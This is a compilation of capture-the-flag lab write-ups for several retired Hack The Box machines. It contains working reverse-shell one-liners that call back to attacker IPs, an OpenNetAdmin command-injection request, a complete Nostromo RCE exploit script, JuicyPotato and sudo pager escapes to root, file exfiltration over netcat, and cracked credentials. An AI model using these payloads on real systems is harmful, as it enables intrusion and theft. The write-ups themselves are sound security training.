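If the padding check raises, the assumed cipher or key derivation is wrong for this binary and the decompiled Decrypt() has to be read more carefully; a correct guess yields the superadmin/funnyhtb pair shown above.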

There are several places where these credentials could be tried. After some hassle with PowerShell privilege escalation, I got a hint to take a different path and try the FTP server.

c:\PENTEST>ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
202 UTF8 mode is always enabled. No need to send this command.
User (10.10.10.158:(none)): superadmin
331 Password required for superadmin
Password:
230 Logged on

root@kalivm:~# ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.158:root): superadmin
331 Password required for superadmin
Password:
230 Logged on
Remote system type is UNIX.

Bingo! Logged in to the FTP server, all that was left to do is check the desktop for the flag and get it!

ftp> dir Desktop
200 Port command successful
150 Opening data channel for directory listing of "/Desktop"
-r--r--r-- 1 ftp ftp            282 May 22  2019 desktop.ini
-r--r--r-- 1 ftp ftp             32 May 22  2019 root.txt
226 Successfully transferred "/Desktop"
ftp> get Desktop/root.txt ./root.txt
local: ./root.txt remote: Desktop/root.txt
200 Port command successful
150 Opening data channel for file download from server of "/Desktop/root.txt"
226 Successfully transferred "/Desktop/root.txt"
32 bytes received in 0.00 secs (223.2143 kB/s)
ftp> 221 Goodbye
root@kali:~/JSON# cat root.txt
3cc85d1bed2ee84af4074101b991d441

The JuicyPotato route to SYSTEM also works.

systeminfo showed Windows Server 2012 Datacenter, and whoami /priv below shows SeImpersonatePrivilege enabled, which is the precondition for JuicyPotato: it abuses that privilege to impersonate the SYSTEM token of a DCOM server that it coerces into authenticating to a local listener. A CLSID of a suitable DCOM server for this OS version, one listed as running as NT AUTHORITY\SYSTEM, comes from http://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/. So I uploaded the exploit and nc.exe and ran them:

PS C:\windows\temp\sedje> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\windows\temp\sedje> certutil -urlcache -split -f http://10.10.16.70/nc.exe C:\users\userpool\Downloads\nc.exe
**** Online ****
0000 ...
6th
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp\sedje> certutil -urlcache -split -f http://10.10.16.70/juicypotato.exe C:\users\userpool\Downloads\juicypotato.exe
**** Online ****
000000 ...
054e00
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp\sedje> cd C:\users\userpool\Downloads\
PS C:\users\userpool\Downloads> .\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\users\userpool\Downloads\nc.exe 10.10.16.70 53 -e cmd.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337
....
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
PS C:\users\userpool\Downloads>
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.158 - - [13/Jan/2020 05:58:01] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.158 - - [13/Jan/2020 05:58:01] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.158 - - [13/Jan/2020 05:58:16] "GET /juicypotato.exe HTTP/1.1" 200 -
10.10.10.158 - - [13/Jan/2020 05:58:17] "GET /juicypotato.exe HTTP/1.1" 200 -
root@kali:~/htb/json# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49972
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

files used: https://github.com/puckiestyle/python/blob/master/htb-json.py

https://github.com/puckiestyle/pentest/blob/master/ysoserial.zip

https://github.com/puckiestyle/pentest/blob/master/juicypotato.exe

https://github.com/pwntester/ysoserial.net

root = 3cc85d1bed2ee84af4074101b991d441

Author: Puckiestyle

HTB-OPENADMIN-NL

As always we start with an nmap scan

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $nmap -sC -sV 10.10.10.171 -oN allports.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 08:23 CEST
Nmap scan report for 10.10.10.171
Host is up (0.090s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.25 seconds
┌─[puck@parrot-lt]─[~/htb/openadmin]
Next we run ffuf against the web root:
┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $ffuf -u http://10.10.10.171/FUZZ -w /usr/share/wordlists/dirb/common.txt

/'___\ /'___\ /'___\ 
/\ \__/ /\ \__/ __ __ /\ \__/ 
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ 
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ 
\ \_\ \ \_\ \ \____/ \ \_\ 
\/_/ \/_/ \/___/ \/_/

v1.3.1-dev
________________________________________________

:: Method : GET
:: URL : http://10.10.10.171/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 95ms]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 101ms]
.hta [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 102ms]
artwork [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 89ms]
[Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 3530ms]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 112ms]
music [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 102ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 106ms]
:: Progress: [4614/4614] :: Job [1/1] :: 391 req/sec :: Duration: [0:00:14] :: Errors: 0 ::

I started focusing on two directories, ona and music. Opening http://openadmin.htb/ona brought me to a web page: the OpenNetAdmin control panel. OpenNetAdmin is an open-source IP Address Management (IPAM) system.

A warning on the start page indicates that the app version is 18.1.1. A quick Google search for vulnerabilities in version 18.1.1 shows that this version is vulnerable to RCE (remote code execution). So at this point we know this box is vulnerable to a recently published exploit.

The ExploitDB listed two exploits, a Metasploit module, and a bash script.

I simply download the script to my OpenAdmin working directory and run it. The script immediately gave me a shell as www-data.

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;id&xajaxargs[]=ping" http://10.10.10.171/ona/ | html2text 
<?xml version="1.0" encoding="utf-8" ?>
CDATA[removeElement('tooltips_results');]]>
CDATA[div]]>
CDATA[initialize_window('tooltips_results');el
('tooltips_results').style.display = 'none';el
('tooltips_results').style.visibility = 'hidden';el('tooltips_results').onclick
= function(ev) { focus_window(this.id); };]]>
CDATA[
Ping Results  [/ona/images/icon_close.gif]

uid=33(www-data) gid=33(www-data) groups=33(www-data)
[Unknown INPUT type]
]]>
CDATA[toggle_window('tooltips_results');]]>

Now to get a reverse shell through the same injection:

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.3/443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/

and catch the shell on a listener:

┌─[✗]─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.171] 54102
bash: cannot set terminal process group (1237): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@openadmin:/opt/ona/www$

 

Since www-data is a low-privileged user, we can't do much with it, so we need to escalate to the next user.

You can of course also do this in Burp, as below,

and then use a netcat reverse shell that doesn't need nc -e:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.70 443 >/tmp/f

Remember to URL-encode the payload first (Ctrl-U in Burp).

First we need to find the users on the box. With cat /etc/passwd we find:

-snip-
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

So we've found a couple of users on this box, but I'm not sure which one to go for first. Let's start enumerating the box for hints.

After a while I found a PHP file named “database_settings.inc.php” in the directory /opt/ona/www/local/config/. The file contains MySQL database credentials.

So far we don't know which user these credentials belong to, so I listed the local users on the box and found jimmy and joanna.
www-data@openadmin:/opt/ona/www$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php

$ona_contexts=array (
'DEFAULT' => 
array (
'databases' => 
array (
0 => 
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);

?>www-data@openadmin:/opt/ona/www$

PRIVILEGE ESCALATION

Since SSH is open, I tried logging in to the box as jimmy with the database password; luckily, it worked.

root@kali:~/htb# ssh jimmy@10.10.10.171
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Jan 8 12:44:49 UTC 2020

System load: 1.25 Processes: 147
Usage of /: 49.1% of 7.81GB Users logged in: 1
Memory usage: 31% IP address for ens160: 10.10.10.171
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jan 8 12:25:57 2020 from 10.10.14.11
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)

After a while, however, it turned out that this user doesn't have the user flag, so let's keep enumerating. The www directory has a special folder named 'internal' that contains:

jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23 17:43 .
drwxr-xr-x 4 root root 4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - 
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 
tcp6 0 0 :::80 :::* LISTEN - 
tcp6 0 0 :::22 :::* LISTEN - 
udp 0 0 127.0.0.53:53 0.0.0.0:* - 
jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
-snip-
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
root@kali:~/htb/openadmin# ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Jan 9 15:12:18 UTC 2020

System load: 1.08 Processes: 136
Usage of /: 49.0% of 7.81GB Users logged in: 1
Memory usage: 30% IP address for ens160: 10.10.10.171
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan 9 09:46:48 2020 from 10.10.16.70
joanna@openadmin:~$ cat user.txt 
c9b2cf07d40807e62af62660f0c81b5f
joanna@openadmin:~$

GETTING ROOT

Procedure 1: getting the root flag via nano:

The command sudo -l revealed that user joanna can run /bin/nano /opt/priv as root without a password. When you see that a user can run nano as root, this is the easiest thing to exploit. Just 3 commands and the box is yours.

Run:

joanna@openadmin:~$ sudo /bin/nano /opt/priv

Procedure 2: root shell

gtfobins has a page on nano. The path to get shell from sudo is as follows:

sudo nano
^R^X
reset; sh 1>&0 2>&0

This will give you a root shell 🙂

That's it. Thanks for reading.

HTB-TRAVERXEC-NL

Traverxec starts with a public exploit for the Nostromo web server to get the initial foothold. Next we enumerate a directory readable by www-data in the home directory of the user David, where we find an SSH key. We then find a server-stats.sh in David's home directory and use GTFOBins to get root.

As always we start with an nmap scan.

# Nmap 7.80 scan initiated Mon Jan 6 07:38:53 2020 as: nmap -sC -sV -oA traverxec_nmap 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.031s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 6 07:39:08 2020 -- 1 IP address (1 host up) scanned in 15.62 seconds

We have port 22 and 80 open on Traverxec.

Getting a web shell with Nostromo

Although Nmap pulled Nostromo 1.9.6 from the headers, I first checked whether there was anything on the website; there was nothing but a template site for a user named David and his portfolio.

Traverxec port 80

After looking around and finding nothing, I opened Burp, intercepted the site and noticed that the server's banner and version were in the server response.

Traverxec Server Header

Since I had clearly overlooked Nostromo 1.9.6 in my Nmap results, this was a new finding, and I started looking for public exploits for this version of Nostromo. It turned out to be a directory traversal leading to RCE. Read more about the vulnerability here: https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html . This is the exploit script I used: https://github.com/puckiestyle/python/blob/master/nostromo196-rce.py
root@kali:~/htb/traverxec# cat nostromo-rce.py 
#!/usr/bin/env python

import socket
import argparse

parser = argparse.ArgumentParser(description='RCE in Nostromo web server through 1.9.6 due to path traversal.')
parser.add_argument('host',help='domain/IP of the Nostromo web server')
parser.add_argument('port',help='port number',type=int)
parser.add_argument('cmd',help='command to execute, default is id',default='/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat /root/root.tx',nargs='?')
args = parser.parse_args()

def recv(s):
	r=''
	try:
		while True:
			t=s.recv(1024)
			if len(t)==0:
				break
			r+=t
	except:
		pass
	return r
def exploit(host,port,cmd):
	s=socket.socket()
	s.settimeout(1)
	s.connect((host,int(port)))
	payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
	s.send(payload)
	r=recv(s)
	r=r[r.index('\r\n\r\n')+4:]
	print r

exploit(args.host,args.port,args.cmd)

Next I exploited this vulnerability and got a shell back.

root@kali:~/htb/traverxec# python nostromo196-rce.py 10.10.10.165 80 
Enter your command:id
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 08:30:35 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enter your command:which nc
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 08:30:39 GMT
Server: nostromo 1.9.6
Connection: close


/usr/bin/nc

Enter your command:nc -e /bin/sh 10.10.16.70 443
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 08:32:09 GMT
Server: nostromo 1.9.6
Connection: close

Enter your command:
Traverxec Shell
root@kali:~/htb/traverxec# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.165] 38412
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$

User on Traverxec

So I got onto Traverxec as www-data, ran LinEnum and found nothing. The first logical step was to look in the Nostromo directory for configuration files that might hold credentials, so I checked the directory /var/nostromo/conf. I had seen it in the LinEnum output as readable by www-data, so we'll look at the nhttpd.conf file.

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf 
# MAIN [MANDATORY]
servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html
# LOGS [OPTIONAL]
logpid			logs/nhttpd.pid
# SETUID [RECOMMENDED]
user			www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons			/var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs		/home
homedirs_public		public_www

Reading the configuration file, it looked like there is a public_www directory under /home. We can't read David's home directory itself, but it seems there is a public_www inside it. I then downloaded the SSH files found there with netcat.

www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz. 
www-data@traverxec:/home/david/public_www/protected-file-area$ nc -w 3 10.10.16.70 1234 < backup-ssh-identity-files.tgz
root@kali:~/htb/traverxec# nc -l -p 1234 > backup-ssh-identity-files.tgz
root@kali:~/htb/traverxec# python2 sshng2john.py id_rsa > id_rsa.encrypted
root@kali:~/htb/traverxec# john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:13 DONE (2020-01-07 08:28) 0.07621g/s 1093Kp/s 1093Kc/s 1093KC/s *7¡Vamos!
Session completed

Now we log in with David's SSH key using the passphrase hunter.

root@kali:~/htb/traverxec# ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Wed Jan 8 02:45:02 2020 from 10.10.16.70
david@traverxec:~$ ls -la
total 44
drwx--x--x 6 david david 4096 Jan 8 03:38 .
drwxr-xr-x 3 root root 4096 Oct 25 14:32 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 14:32 .bashrc
drwx------ 2 david david 4096 Jan 8 03:31 bin
-rw------- 1 david david 147 Jan 8 03:38 .lesshst
drwxr-xr-x 3 david david 4096 Jan 7 08:38 .local
-rw-r--r-- 1 david david 807 Oct 25 14:32 .profile
drwxr-xr-x 3 david david 4096 Oct 25 15:45 public_www
drwx------ 2 david david 4096 Jan 8 00:02 .ssh
-r--r----- 1 root david 33 Oct 25 16:14 user.txt
david@traverxec:~$

Getting root

The first thing I noticed after getting user and starting on privilege escalation is that there is a bin folder in David's home directory with a file named server-stats.sh. Looking closer at the script, I saw that /usr/bin/journalctl is run as root. So I went to GTFOBins https://gtfobins.github.io/gtfobins/journalctl/ and found that it is enough to run the command exactly as given in the script and abuse the less prompt that opens (as sudo) with !/bin/bash.

There is one catch: make your terminal smaller or it won't work, because the pager only opens when the output is larger than your terminal.

The script returns the last 5 lines of the nostromo service log with journalctl. This is exploitable because journalctl invokes the default pager, which is most likely less. The less command displays output on the user's screen and waits for user input once the content is shown. This can be abused to run a shell command:

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

The command above invokes less, after which we can run shell commands by prefixing them with !. Let's try running /bin/bash:

!/bin/bash

david@traverxec:~/bin$ sudo journalctl -n5 -unostromo.service

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2022-05-13 08:47:02 EDT, end at Fri 2022-05-13 10
May 13 08:47:04 traverxec systemd[1]: Starting nostromo nhttpd server.
May 13 08:47:04 traverxec nhttpd[420]: started
May 13 08:47:04 traverxec nhttpd[420]: max. file descriptors = 1040 (c
May 13 08:47:04 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt 
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:/home/david/bin#
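Both the nano rule on OpenAdmin and the journalctl rule here are sudo grants to programs that can hand the caller a shell. As an added check (my code, not from the writeup; the list of escapable binaries is an assumption drawn from GTFOBins), a small sudoers audit that flags such rules, run over a constructed sample:

```python
"""Added example, not from this writeup: an audit of sudoers user-specification
lines that flags rules granting root to programs known to hand the caller a shell
(editors, pagers, and commands that open a pager), which is what both the nano
rule on OpenAdmin and the journalctl rule here rely on. The binary list is an
assumption drawn from the GTFOBins entries the writeup cites."""
import re
from collections import namedtuple

# Programs that can escape to a shell when run under sudo (assumed, not exhaustive).
SHELL_ESCAPE_BINARIES = {
    "nano", "vi", "vim", "less", "more", "man", "journalctl", "systemctl",
    "git", "find", "awk", "python", "python3", "perl", "env", "bash", "sh",
}

Finding = namedtuple("Finding", "line user runas command reason")

# user host=(runas) [TAG:]... command [args]
_USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<body>.+)$"
)
_TAG = re.compile(
    r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)


def _split_commands(body):
    """Split 'NOPASSWD: /bin/nano /opt/priv, /usr/bin/id' into (tags, command) pairs."""
    result = []
    for entry in body.split(","):
        entry, tags = entry.strip(), set()
        while True:
            m = _TAG.match(entry)
            if not m:
                break
            tags.add(m.group(1))
            entry = entry[m.end():]
        result.append((tags, entry))
    return result


def audit_sudoers(text):
    """Return a list of Finding for rules that run as root and look escapable."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = _USER_SPEC.match(line)
        if not m or m.group("user") == "root":
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        if runas not in ("root", "ALL"):
            continue  # only root-equivalent grants are in scope here
        for tags, cmd in _split_commands(m.group("body")):
            words = cmd.split()
            prog = words[0] if words else ""
            name = prog.rsplit("/", 1)[-1]
            reason = None
            if prog == "ALL":
                reason = "unrestricted ALL"
            elif name in SHELL_ESCAPE_BINARIES and "NOEXEC" not in tags:
                # NOEXEC blocks the child exec (LD_PRELOAD based, so it does not
                # cover static binaries); for journalctl, adding --no-pager to the
                # rule is the more direct fix.
                reason = f"{name} can spawn a shell"
            elif "*" in cmd:
                reason = "wildcard in command arguments"
            if reason:
                findings.append(Finding(lineno, m.group("user"), runas, cmd, reason))
    return findings


# Constructed sample, modelled on the two rules the writeup abuses plus controls.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
david   ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/* /backup/
ops     ALL=(root) NOEXEC: /usr/bin/vim /etc/motd
www     ALL=(www-data) /usr/bin/vim /var/www/index.html
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f.line}: {f.user} -> ({f.runas}) {f.command}: {f.reason}")
```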

 

Author: Jacco Straathof

 

HTB-CRAFT-NL

Craft is retired. I really enjoyed solving it. The IP address is 10.10.10.110 and I added it to /etc/hosts as craft.htb. Let's dive right in!

Scan

root@kali:~/htb/craft# nmap -sV -O craft.htb -oN scan.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 05:32 EST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 05:33 (0:00:12 remaining)
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.054s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
443/tcp open  ssl/http nginx 1.15.8
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds

Port 443 is open, which means a (probably) HTTPS site is running on it. I opened https://craft.htb in a browser:

In the top right corner I found buttons that took me to 2 different subdomains: api.craft.htb and gogs.craft.htb. I added these to /etc/hosts.

Enumerating the 2 subdomains

api.craft.htb wasn't very interesting, since it hosted an API that was only accessible with valid credentials.

Before testing the API, I wanted to make sure there was nothing easier to exploit on gogs.craft.htb.

It turned out I was right. There is a publicly accessible repository containing the API's source code:

In addition, there was an interesting issue:

Dinesh:
Fix is live and seems to be working :)

c414b16057

Gilfoyle:
I fixed the database schema so this is not an issue now.. Can we remove that sorry excuse for a "patch" before something awful happens?

